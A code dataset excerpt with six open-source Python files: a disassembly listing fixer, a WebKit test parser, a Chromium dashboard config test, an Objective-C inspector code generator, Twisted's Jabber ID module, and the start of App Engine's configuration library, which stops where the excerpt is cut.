repo_name | path | copies | size | content | license
---|---|---|---|---|---|
pfalcon/ScratchABlock
|
correct_internal_entrypoint.py
|
1
|
1344
|
#!/usr/bin/env python3
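# Added descriptive comment (inferred from the code below, not part of the
# original script): this rewrites ScratchABlock .lst listing files whose first
# line is "; Entry point: <name>". The comment line is dropped, a fresh
# "<addr>.0 <name>:" entry label and an "<addr>.0 goto <name>.0" stub are
# prepended, and the original "<name>:" label inside the listing is renamed to
# "<name>.0:". Usage: correct_internal_entrypoint.py <file.lst | directory>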
import sys
import os
import glob
def process_file(fname):
func_name = None
with open(fname) as f:
l = f.readline()
if not l.startswith("; Entry point: "):
return
l = l.strip()
head, func_name = l.rsplit(None, 1)
assert func_name
print("Processing:", fname)
os.rename(fname, fname + ".bak")
with open(fname + ".bak") as f, open(fname, "w") as f_out:
l = f.readline()
assert l[0] == ";"
# Don't write this line
l = f.readline()
addr, rest = l.split(None, 1)
f_out.write("%s.0 %s:\n" % (addr, func_name))
f_out.write("%s.0 goto %s.0\n" % (addr, func_name))
f_out.write(l)
for l in f:
addr, label = l.split(None, 1)
label = label.strip()
if label[-1] == ":" and not label.startswith("loc_"):
this_name = label[:-1]
if func_name == this_name:
l = l.replace(func_name, func_name + ".0")
f_out.write(l)
if __name__ == "__main__":
if os.path.isdir(sys.argv[1]):
for full_name in glob.glob(sys.argv[1] + "/*"):
if full_name.endswith(".lst") and os.path.isfile(full_name):
process_file(full_name)
else:
process_file(sys.argv[1])
|
gpl-3.0
|
likaiwalkman/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/w3c/test_parser.py
|
135
|
6756
|
#!/usr/bin/env python
# Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import logging
import re
from webkitpy.common.host import Host
from webkitpy.thirdparty.BeautifulSoup import BeautifulSoup as Parser
_log = logging.getLogger(__name__)
class TestParser(object):
def __init__(self, options, filename):
self.options = options
self.filename = filename
self.host = Host()
self.filesystem = self.host.filesystem
self.test_doc = None
self.ref_doc = None
self.load_file(filename)
def load_file(self, filename):
if self.filesystem.isfile(filename):
try:
self.test_doc = Parser(self.filesystem.read_binary_file(filename))
except:
# FIXME: Figure out what to do if we can't parse the file.
_log.error("Failed to parse %s", filename)
self.test_doc = None
else:
if self.filesystem.isdir(filename):
# FIXME: Figure out what is triggering this and what to do about it.
_log.error("Trying to load %s, which is a directory", filename)
self.test_doc = None
self.ref_doc = None
def analyze_test(self, test_contents=None, ref_contents=None):
""" Analyzes a file to determine if it's a test, what type of test, and what reference or support files it requires. Returns all of the test info """
test_info = None
if test_contents is None and self.test_doc is None:
return test_info
if test_contents is not None:
self.test_doc = Parser(test_contents)
if ref_contents is not None:
self.ref_doc = Parser(ref_contents)
# First check if it's a reftest
matches = self.reference_links_of_type('match') + self.reference_links_of_type('mismatch')
if matches:
if len(matches) > 1:
# FIXME: Is this actually true? We should fix this.
_log.warning('Multiple references are not supported. Importing the first ref defined in %s',
self.filesystem.basename(self.filename))
try:
ref_file = self.filesystem.join(self.filesystem.dirname(self.filename), matches[0]['href'])
except KeyError as e:
# FIXME: Figure out what to do w/ invalid test files.
_log.error('%s has a reference link but is missing the "href"', self.filename)
return None
if self.ref_doc is None:
self.ref_doc = self.load_file(ref_file)
test_info = {'test': self.filename, 'reference': ref_file}
# If the ref file path is relative, we need to check it for
# relative paths also because when it lands in WebKit, it will be
# moved down into the test dir.
#
# Note: The test files themselves are not checked for support files
# outside their directories as the convention in the CSSWG is to
# put all support files in the same dir or subdir as the test.
#
# All non-test files in the test's directory tree are normally
# copied as part of the import as they are assumed to be required
# support files.
#
# *But*, there is exactly one case in the entire css2.1 suite where
# a test depends on a file that lives in a different directory,
# which depends on another file that lives outside of its
# directory. This code covers that case :)
if matches[0]['href'].startswith('..'):
support_files = self.support_files(self.ref_doc)
test_info['refsupport'] = support_files
elif self.is_jstest():
test_info = {'test': self.filename, 'jstest': True}
elif self.options['all'] is True and not('-ref' in self.filename) and not('reference' in self.filename):
test_info = {'test': self.filename}
return test_info
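# Illustrative sketch (not in the original file) of the return shapes produced
# by analyze_test(), derived from the branches above:
#   {'test': <path>, 'reference': <ref path>}                      # reftest
#   {'test': <path>, 'reference': <ref path>, 'refsupport': [...]} # ref uses '..' paths
#   {'test': <path>, 'jstest': True}                               # testharness.js test
#   {'test': <path>}                                               # imported via options['all']
#   None                                                           # not recognised as a test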
def reference_links_of_type(self, reftest_type):
return self.test_doc.findAll(rel=reftest_type)
def is_jstest(self):
"""Returns whether the file appears to be a jstest, by searching for usage of W3C-style testharness paths."""
return bool(self.test_doc.find(src=re.compile('[\'\"/]?/resources/testharness')))
def support_files(self, doc):
""" Searches the file for all paths specified in url()'s, href or src attributes."""
support_files = []
if doc is None:
return support_files
elements_with_src_attributes = doc.findAll(src=re.compile('.*'))
elements_with_href_attributes = doc.findAll(href=re.compile('.*'))
url_pattern = re.compile('url\(.*\)')
urls = []
for url in doc.findAll(text=url_pattern):
url = re.search(url_pattern, url)
url = re.sub('url\([\'\"]?', '', url.group(0))
url = re.sub('[\'\"]?\)', '', url)
urls.append(url)
src_paths = [src_tag['src'] for src_tag in elements_with_src_attributes]
href_paths = [href_tag['href'] for href_tag in elements_with_href_attributes]
paths = src_paths + href_paths + urls
for path in paths:
if not(path.startswith('http:')) and not(path.startswith('mailto:')):
support_files.append(path)
return support_files
|
bsd-3-clause
|
zeptonaut/catapult
|
dashboard/dashboard/edit_site_config_test.py
|
4
|
4132
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import webapp2
import webtest
from google.appengine.api import users
from dashboard import edit_site_config
from dashboard import namespaced_stored_object
from dashboard import stored_object
from dashboard import testing_common
from dashboard import xsrf
class EditSiteConfigTest(testing_common.TestCase):
def setUp(self):
super(EditSiteConfigTest, self).setUp()
app = webapp2.WSGIApplication(
[('/edit_site_config', edit_site_config.EditSiteConfigHandler)])
self.testapp = webtest.TestApp(app)
testing_common.SetInternalDomain('internal.org')
self.SetCurrentUser('[email protected]', is_admin=True)
def testGet_NoKey_ShowsPageWithNoTextArea(self):
response = self.testapp.get('/edit_site_config')
self.assertEqual(0, len(response.html('textarea')))
def testGet_WithNonNamespacedKey_ShowsPageWithCurrentValue(self):
stored_object.Set('foo', 'XXXYYY')
response = self.testapp.get('/edit_site_config?key=foo')
self.assertEqual(1, len(response.html('form')))
self.assertIn('XXXYYY', response.body)
def testGet_WithNamespacedKey_ShowsPageWithBothVersions(self):
namespaced_stored_object.Set('foo', 'XXXYYY')
namespaced_stored_object.SetExternal('foo', 'XXXinternalYYY')
response = self.testapp.get('/edit_site_config?key=foo')
self.assertEqual(1, len(response.html('form')))
self.assertIn('XXXYYY', response.body)
self.assertIn('XXXinternalYYY', response.body)
def testPost_NoXsrfToken_ReturnsErrorStatus(self):
self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, 3]',
}, status=403)
def testPost_ExternalUser_ShowsErrorMessage(self):
self.SetCurrentUser('[email protected]')
response = self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, 3]',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertIn('Only internal users', response.body)
def testPost_WithKey_UpdatesNonNamespacedValues(self):
self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, 3]',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertEqual([1, 2, 3], stored_object.Get('foo'))
def testPost_WithSomeInvalidJSON_ShowsErrorAndDoesNotModify(self):
stored_object.Set('foo', 'XXX')
response = self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, this is not json',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertIn('Invalid JSON', response.body)
self.assertEqual('XXX', stored_object.Get('foo'))
def testPost_WithKey_UpdatesNamespacedValues(self):
namespaced_stored_object.Set('foo', 'XXXinternalYYY')
namespaced_stored_object.SetExternal('foo', 'XXXYYY')
self.testapp.post('/edit_site_config', {
'key': 'foo',
'external_value': '{"x": "y"}',
'internal_value': '{"x": "yz"}',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertEqual({'x': 'yz'}, namespaced_stored_object.Get('foo'))
self.assertEqual({'x': 'y'}, namespaced_stored_object.GetExternal('foo'))
def testPost_SendsNotificationEmail(self):
self.testapp.post('/edit_site_config', {
'key': 'foo',
'external_value': '{"x": "y"}',
'internal_value': '{"x": "yz"}',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
messages = self.mail_stub.get_sent_messages()
self.assertEqual(1, len(messages))
self.assertEqual('[email protected]', messages[0].sender)
self.assertEqual('[email protected]', messages[0].to)
self.assertEqual(
'Config "foo" changed by [email protected]', messages[0].subject)
self.assertIn('{"x": "y"}', str(messages[0].body))
self.assertIn('{"x": "yz"}', str(messages[0].body))
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
Debian/openjfx
|
modules/web/src/main/native/Source/JavaScriptCore/inspector/scripts/codegen/generate_objc_backend_dispatcher_implementation.py
|
3
|
11619
|
#!/usr/bin/env python
#
# Copyright (c) 2014-2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import logging
import string
import re
from string import Template
from cpp_generator import CppGenerator
from generator import Generator
from models import PrimitiveType, EnumType, AliasedType, Frameworks
from objc_generator import ObjCTypeCategory, ObjCGenerator, join_type_and_name
from objc_generator_templates import ObjCGeneratorTemplates as ObjCTemplates
log = logging.getLogger('global')
class ObjCBackendDispatcherImplementationGenerator(ObjCGenerator):
def __init__(self, *args, **kwargs):
ObjCGenerator.__init__(self, *args, **kwargs)
def output_filename(self):
return '%sBackendDispatchers.mm' % self.protocol_name()
def domains_to_generate(self):
return filter(self.should_generate_commands_for_domain, Generator.domains_to_generate(self))
def generate_output(self):
secondary_headers = [
'"%sInternal.h"' % self.protocol_name(),
'"%sTypeConversions.h"' % self.protocol_name(),
'<JavaScriptCore/InspectorValues.h>',
]
header_args = {
'primaryInclude': '"%sBackendDispatchers.h"' % self.protocol_name(),
'secondaryIncludes': '\n'.join(['#include %s' % header for header in secondary_headers]),
}
domains = self.domains_to_generate()
sections = []
sections.append(self.generate_license())
sections.append(Template(ObjCTemplates.BackendDispatcherImplementationPrelude).substitute(None, **header_args))
sections.extend(map(self._generate_handler_implementation_for_domain, domains))
sections.append(Template(ObjCTemplates.BackendDispatcherImplementationPostlude).substitute(None, **header_args))
return '\n\n'.join(sections)
def _generate_handler_implementation_for_domain(self, domain):
commands = self.commands_for_domain(domain)
if not commands:
return ''
command_declarations = []
for command in commands:
command_declarations.append(self._generate_handler_implementation_for_command(domain, command))
return '\n'.join(command_declarations)
def _generate_handler_implementation_for_command(self, domain, command):
lines = []
parameters = ['long requestId']
for parameter in command.call_parameters:
parameters.append('%s in_%s' % (CppGenerator.cpp_type_for_unchecked_formal_in_parameter(parameter), parameter.parameter_name))
command_args = {
'domainName': domain.domain_name,
'commandName': command.command_name,
'parameters': ', '.join(parameters),
'successCallback': self._generate_success_block_for_command(domain, command),
'conversions': self._generate_conversions_for_command(domain, command),
'invocation': self._generate_invocation_for_command(domain, command),
}
return self.wrap_with_guard_for_domain(domain, Template(ObjCTemplates.BackendDispatcherHeaderDomainHandlerImplementation).substitute(None, **command_args))
def _generate_success_block_for_command(self, domain, command):
lines = []
if command.return_parameters:
success_block_parameters = []
for parameter in command.return_parameters:
objc_type = self.objc_type_for_param(domain, command.command_name, parameter)
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
success_block_parameters.append(join_type_and_name(objc_type, var_name))
lines.append(' id successCallback = ^(%s) {' % ', '.join(success_block_parameters))
else:
lines.append(' id successCallback = ^{')
if command.return_parameters:
lines.append(' Ref<InspectorObject> resultObject = InspectorObject::create();')
required_pointer_parameters = filter(lambda parameter: not parameter.is_optional and ObjCGenerator.is_type_objc_pointer_type(parameter.type), command.return_parameters)
for parameter in required_pointer_parameters:
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
lines.append(' THROW_EXCEPTION_FOR_REQUIRED_PARAMETER(%s, @"%s");' % (var_name, var_name))
objc_array_class = self.objc_class_for_array_type(parameter.type)
if objc_array_class and objc_array_class.startswith(self.objc_prefix()):
lines.append(' THROW_EXCEPTION_FOR_BAD_TYPE_IN_ARRAY(%s, [%s class]);' % (var_name, objc_array_class))
optional_pointer_parameters = filter(lambda parameter: parameter.is_optional and ObjCGenerator.is_type_objc_pointer_type(parameter.type), command.return_parameters)
for parameter in optional_pointer_parameters:
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
lines.append(' THROW_EXCEPTION_FOR_BAD_OPTIONAL_PARAMETER(%s, @"%s");' % (var_name, var_name))
objc_array_class = self.objc_class_for_array_type(parameter.type)
if objc_array_class and objc_array_class.startswith(self.objc_prefix()):
lines.append(' THROW_EXCEPTION_FOR_BAD_TYPE_IN_OPTIONAL_ARRAY(%s, [%s class]);' % (var_name, objc_array_class))
for parameter in command.return_parameters:
keyed_set_method = CppGenerator.cpp_setter_method_for_type(parameter.type)
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
var_expression = '*%s' % var_name if parameter.is_optional else var_name
export_expression = self.objc_protocol_export_expression_for_variable(parameter.type, var_expression)
if not parameter.is_optional:
lines.append(' resultObject->%s(ASCIILiteral("%s"), %s);' % (keyed_set_method, parameter.parameter_name, export_expression))
else:
lines.append(' if (%s)' % var_name)
lines.append(' resultObject->%s(ASCIILiteral("%s"), %s);' % (keyed_set_method, parameter.parameter_name, export_expression))
lines.append(' backendDispatcher()->sendResponse(requestId, WTFMove(resultObject));')
else:
lines.append(' backendDispatcher()->sendResponse(requestId, InspectorObject::create());')
lines.append(' };')
return '\n'.join(lines)
def _generate_conversions_for_command(self, domain, command):
lines = []
if command.call_parameters:
lines.append('')
def in_param_expression(param_name, parameter):
_type = parameter.type
if isinstance(_type, AliasedType):
_type = _type.aliased_type # Fall through to enum or primitive.
if isinstance(_type, EnumType):
_type = _type.primitive_type # Fall through to primitive.
if isinstance(_type, PrimitiveType):
if _type.raw_name() in ['array', 'any', 'object']:
return '&%s' % param_name if not parameter.is_optional else param_name
return '*%s' % param_name if parameter.is_optional else param_name
return '&%s' % param_name if not parameter.is_optional else param_name
for parameter in command.call_parameters:
in_param_name = 'in_%s' % parameter.parameter_name
objc_in_param_name = 'o_%s' % in_param_name
objc_type = self.objc_type_for_param(domain, command.command_name, parameter, False)
if isinstance(parameter.type, EnumType):
objc_type = 'std::optional<%s>' % objc_type
param_expression = in_param_expression(in_param_name, parameter)
import_expression = self.objc_protocol_import_expression_for_parameter(param_expression, domain, command.command_name, parameter)
if not parameter.is_optional:
lines.append(' %s = %s;' % (join_type_and_name(objc_type, objc_in_param_name), import_expression))
if isinstance(parameter.type, EnumType):
lines.append(' if (!%s) {' % objc_in_param_name)
lines.append(' backendDispatcher()->reportProtocolError(BackendDispatcher::InvalidParams, String::format("Parameter \'%%s\' of method \'%%s\' cannot be processed", "%s", "%s.%s"));' % (parameter.parameter_name, domain.domain_name, command.command_name))
lines.append(' return;')
lines.append(' }')
else:
lines.append(' %s;' % join_type_and_name(objc_type, objc_in_param_name))
lines.append(' if (%s)' % in_param_name)
lines.append(' %s = %s;' % (objc_in_param_name, import_expression))
if lines:
lines.append('')
return '\n'.join(lines)
def _generate_invocation_for_command(self, domain, command):
pairs = []
pairs.append('WithErrorCallback:errorCallback')
pairs.append('successCallback:successCallback')
for parameter in command.call_parameters:
in_param_name = 'in_%s' % parameter.parameter_name
objc_in_param_expression = 'o_%s' % in_param_name
if not parameter.is_optional:
# FIXME: we don't handle optional enum values in commands here because it isn't used anywhere yet.
# We'd need to change the delegate's signature to take std::optional for optional enum values.
if isinstance(parameter.type, EnumType):
objc_in_param_expression = '%s.value()' % objc_in_param_expression
pairs.append('%s:%s' % (parameter.parameter_name, objc_in_param_expression))
else:
optional_expression = '(%s ? &%s : nil)' % (in_param_name, objc_in_param_expression)
pairs.append('%s:%s' % (parameter.parameter_name, optional_expression))
return ' [m_delegate %s%s];' % (command.command_name, ' '.join(pairs))
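# Illustrative sketch (added; the command and parameter names are hypothetical)
# of the delegate invocation emitted by _generate_invocation_for_command for a
# command "getDatabaseNames" with one required parameter "securityOrigin":
#   [m_delegate getDatabaseNamesWithErrorCallback:errorCallback successCallback:successCallback securityOrigin:o_in_securityOrigin];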
|
gpl-2.0
|
ashray/VTK-EVM
|
ThirdParty/Twisted/twisted/words/protocols/jabber/jid.py
|
68
|
7157
|
# -*- test-case-name: twisted.words.test.test_jabberjid -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Jabber Identifier support.
This module provides an object to represent Jabber Identifiers (JIDs) and
parse string representations into them with proper checking for illegal
characters, case folding and canonicalisation through L{stringprep<twisted.words.protocols.jabber.xmpp_stringprep>}.
"""
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep, resourceprep, nameprep
class InvalidFormat(Exception):
"""
The given string could not be parsed into a valid Jabber Identifier (JID).
"""
def parse(jidstring):
"""
Parse given JID string into its respective parts and apply stringprep.
@param jidstring: string representation of a JID.
@type jidstring: C{unicode}
@return: tuple of (user, host, resource), each of type C{unicode} as
the parsed and stringprep'd parts of the given JID. If the
given string did not have a user or resource part, the respective
field in the tuple will hold C{None}.
@rtype: C{tuple}
"""
user = None
host = None
resource = None
# Search for delimiters
user_sep = jidstring.find("@")
res_sep = jidstring.find("/")
if user_sep == -1:
if res_sep == -1:
# host
host = jidstring
else:
# host/resource
host = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
else:
if res_sep == -1:
# user@host
user = jidstring[0:user_sep] or None
host = jidstring[user_sep + 1:]
else:
if user_sep < res_sep:
# user@host/resource
user = jidstring[0:user_sep] or None
host = jidstring[user_sep + 1:user_sep + (res_sep - user_sep)]
resource = jidstring[res_sep + 1:] or None
else:
# host/resource (with an @ in resource)
host = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
return prep(user, host, resource)
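# Illustrative examples (added, not part of the original module): parse() splits
# on the first "@" and "/" delimiters and stringpreps each fragment, e.g.
#   parse(u"romeo@montague.net/orchard")  # -> (u'romeo', u'montague.net', u'orchard')
#   parse(u"montague.net/orchard")        # -> (None, u'montague.net', u'orchard')
#   parse(u"montague.net")                # -> (None, u'montague.net', None)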
def prep(user, host, resource):
"""
Perform stringprep on all JID fragments.
@param user: The user part of the JID.
@type user: C{unicode}
@param host: The host part of the JID.
@type host: C{unicode}
@param resource: The resource part of the JID.
@type resource: C{unicode}
@return: The given parts with stringprep applied.
@rtype: C{tuple}
"""
if user:
try:
user = nodeprep.prepare(unicode(user))
except UnicodeError:
raise InvalidFormat, "Invalid character in username"
else:
user = None
if not host:
raise InvalidFormat, "Server address required."
else:
try:
host = nameprep.prepare(unicode(host))
except UnicodeError:
raise InvalidFormat, "Invalid character in hostname"
if resource:
try:
resource = resourceprep.prepare(unicode(resource))
except UnicodeError:
raise InvalidFormat, "Invalid character in resource"
else:
resource = None
return (user, host, resource)
__internJIDs = {}
def internJID(jidstring):
"""
Return interned JID.
@rtype: L{JID}
"""
if jidstring in __internJIDs:
return __internJIDs[jidstring]
else:
j = JID(jidstring)
__internJIDs[jidstring] = j
return j
class JID(object):
"""
Represents a stringprep'd Jabber ID.
JID objects are hashable so they can be used in sets and as keys in
dictionaries.
"""
def __init__(self, str=None, tuple=None):
if not (str or tuple):
raise RuntimeError("You must provide a value for either 'str' or "
"'tuple' arguments.")
if str:
user, host, res = parse(str)
else:
user, host, res = prep(*tuple)
self.user = user
self.host = host
self.resource = res
def userhost(self):
"""
Extract the bare JID as a unicode string.
A bare JID does not have a resource part, so this returns either
C{user@host} or just C{host}.
@rtype: C{unicode}
"""
if self.user:
return u"%s@%s" % (self.user, self.host)
else:
return self.host
def userhostJID(self):
"""
Extract the bare JID.
A bare JID does not have a resource part, so this returns a
L{JID} object representing either C{user@host} or just C{host}.
If the object this method is called upon doesn't have a resource
set, it will return itself. Otherwise, the bare JID object will
be created, interned using L{internJID}.
@rtype: L{JID}
"""
if self.resource:
return internJID(self.userhost())
else:
return self
def full(self):
"""
Return the string representation of this JID.
@rtype: C{unicode}
"""
if self.user:
if self.resource:
return u"%s@%s/%s" % (self.user, self.host, self.resource)
else:
return u"%s@%s" % (self.user, self.host)
else:
if self.resource:
return u"%s/%s" % (self.host, self.resource)
else:
return self.host
def __eq__(self, other):
"""
Equality comparison.
L{JID}s compare equal if their user, host and resource parts all
compare equal. When comparing against instances of other types, it
uses the default comparison.
"""
if isinstance(other, JID):
return (self.user == other.user and
self.host == other.host and
self.resource == other.resource)
else:
return NotImplemented
def __ne__(self, other):
"""
Inequality comparison.
This negates L{__eq__} for comparison with JIDs and uses the default
comparison for other types.
"""
result = self.__eq__(other)
if result is NotImplemented:
return result
else:
return not result
def __hash__(self):
"""
Calculate hash.
L{JID}s with identical constituent user, host and resource parts have
equal hash values. In combination with the comparison defined on JIDs,
this allows for using L{JID}s in sets and as dictionary keys.
"""
return hash((self.user, self.host, self.resource))
def __unicode__(self):
"""
Get unicode representation.
Return the string representation of this JID as a unicode string.
@see: L{full}
"""
return self.full()
def __repr__(self):
"""
Get object representation.
Returns a string that would create a new JID object that compares equal
to this one.
"""
return 'JID(%r)' % self.full()
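# Illustrative usage sketch (added; follows the docstrings above):
#   jid = JID(u"romeo@montague.net/orchard")
#   jid.userhost()      # -> u'romeo@montague.net'
#   jid.full()          # -> u'romeo@montague.net/orchard'
#   jid.userhostJID()   # interned bare JID equal to JID(u'romeo@montague.net')
#   JID(tuple=(u'romeo', u'montague.net', None)) == jid.userhostJID()  # True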
|
bsd-3-clause
|
mikedchavez1010/XX-Net
|
gae_proxy/server/lib/google/appengine/api/conf.py
|
6
|
11768
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A library for managing flags-like configuration that update dynamically.
"""
import logging
import os
import re
import time
try:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.api import validation
from google.appengine.api import yaml_object
except:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.ext import validation
from google.appengine.ext import yaml_object
DATASTORE_DEADLINE = 1.5
RESERVED_MARKER = 'ah__conf__'
NAMESPACE = '_' + RESERVED_MARKER
CONFIG_KIND = '_AppEngine_Config'
ACTIVE_KEY_NAME = 'active'
FILENAMES = ['conf.yaml', 'conf.yml']
PARAMETERS = 'parameters'
PARAMETER_NAME_REGEX = '[a-zA-Z][a-zA-Z0-9_]*'
_cached_config = None
class Config(db.Expando):
"""The representation of a config in the datastore and memcache."""
ah__conf__version = db.IntegerProperty(default=0, required=True)
@classmethod
def kind(cls):
"""Override the kind name to prevent collisions with users."""
return CONFIG_KIND
def ah__conf__load_from_yaml(self, parsed_config):
"""Loads all the params from a YAMLConfiguration into expando fields.
We set these expando properties with a special name prefix 'p_' to
keep them separate from the static attributes of Config. That way we
don't have to check elsewhere to make sure the user doesn't stomp on
our built in properties.
Args:
parsed_config: A YAMLConfiguration.
"""
for key, value in parsed_config.parameters.iteritems():
setattr(self, key, value)
class _ValidParameterName(validation.Validator):
"""Validator to check if a value is a valid config parameter name.
We only allow valid python attribute names without leading underscores
that also do not collide with reserved words in the datastore models.
"""
def __init__(self):
self.regex = validation.Regex(PARAMETER_NAME_REGEX)
def Validate(self, value, key):
"""Check that all parameter names are valid.
This is used as a validator when parsing conf.yaml.
Args:
value: the value to check.
key: A description of the context for which this value is being
validated.
Returns:
The validated value.
"""
value = self.regex.Validate(value, key)
try:
db.check_reserved_word(value)
except db.ReservedWordError:
raise validation.ValidationError(
'The config parameter name %.100r is reserved by db.Model see: '
'http://code.google.com/appengine/docs/python/datastore/'
'modelclass.html#Disallowed_Property_Names for details.' % value)
if value.startswith(RESERVED_MARKER):
raise validation.ValidationError(
'The config parameter name %.100r is reserved, as are all names '
'beginning with \'%s\', please choose a different name.' % (
value, RESERVED_MARKER))
return value
class _Scalar(validation.Validator):
"""Validator to check if a value is a simple scalar type.
We only allow scalars that are well supported by both the datastore and YAML.
"""
ALLOWED_PARAMETER_VALUE_TYPES = frozenset(
[bool, int, long, float, str, unicode])
def Validate(self, value, key):
"""Check that all parameters are scalar values.
This is used as a validator when parsing conf.yaml
Args:
value: the value to check.
key: the name of parameter corresponding to this value.
Returns:
We just return value unchanged.
"""
if type(value) not in self.ALLOWED_PARAMETER_VALUE_TYPES:
raise validation.ValidationError(
'Expected scalar value for parameter: %s, but found %.100r which '
'is type %s' % (key, value, type(value).__name__))
return value
class _ParameterDict(validation.ValidatedDict):
"""This class validates the parameters dictionary in YAMLConfiguration.
Keys must look like non-private python identifiers and values
must be a supported scalar. See the class comment for YAMLConfiguration.
"""
KEY_VALIDATOR = _ValidParameterName()
VALUE_VALIDATOR = _Scalar()
class YAMLConfiguration(validation.Validated):
"""This class describes the structure of a conf.yaml file.
At the top level the file should have a parameters attribute which is a mapping
from strings to scalars. For example:
parameters:
background_color: 'red'
message_size: 1024
boolean_valued_param: true
"""
ATTRIBUTES = {PARAMETERS: _ParameterDict}
def LoadSingleConf(stream):
"""Load a conf.yaml file or string and return a YAMLConfiguration object.
Args:
stream: a file object corresponding to a conf.yaml file, or its contents
as a string.
Returns:
A YAMLConfiguration instance
"""
return yaml_object.BuildSingleObject(YAMLConfiguration, stream)
def _find_yaml_path():
"""Traverse directory trees to find conf.yaml file.
Begins with the current working directory and then moves up the
directory structure until the file is found.
Returns:
the path of conf.yaml file or None if not found.
"""
current, last = os.getcwd(), None
while current != last:
for yaml_name in FILENAMES:
yaml_path = os.path.join(current, yaml_name)
if os.path.exists(yaml_path):
return yaml_path
last = current
current, last = os.path.dirname(current), current
return None
def _fetch_from_local_file(pathfinder=_find_yaml_path, fileopener=open):
"""Get the configuration that was uploaded with this version.
Args:
pathfinder: a callable to use for finding the path of the conf.yaml
file. This is only for use in testing.
fileopener: a callable to use for opening a named file. This is
only for use in testing.
Returns:
A config class instance for the options that were uploaded. If there
is no config file, return None
"""
yaml_path = pathfinder()
if yaml_path:
config = Config()
config.ah__conf__load_from_yaml(LoadSingleConf(fileopener(yaml_path)))
logging.debug('Loaded conf parameters from conf.yaml.')
return config
return None
def _get_active_config_key(app_version):
"""Generate the key for the active config record belonging to app_version.
Args:
app_version: the major version you want configuration data for.
Returns:
The key for the active Config record for the given app_version.
"""
return db.Key.from_path(
CONFIG_KIND,
'%s/%s' % (app_version, ACTIVE_KEY_NAME),
namespace=NAMESPACE)
def _fetch_latest_from_datastore(app_version):
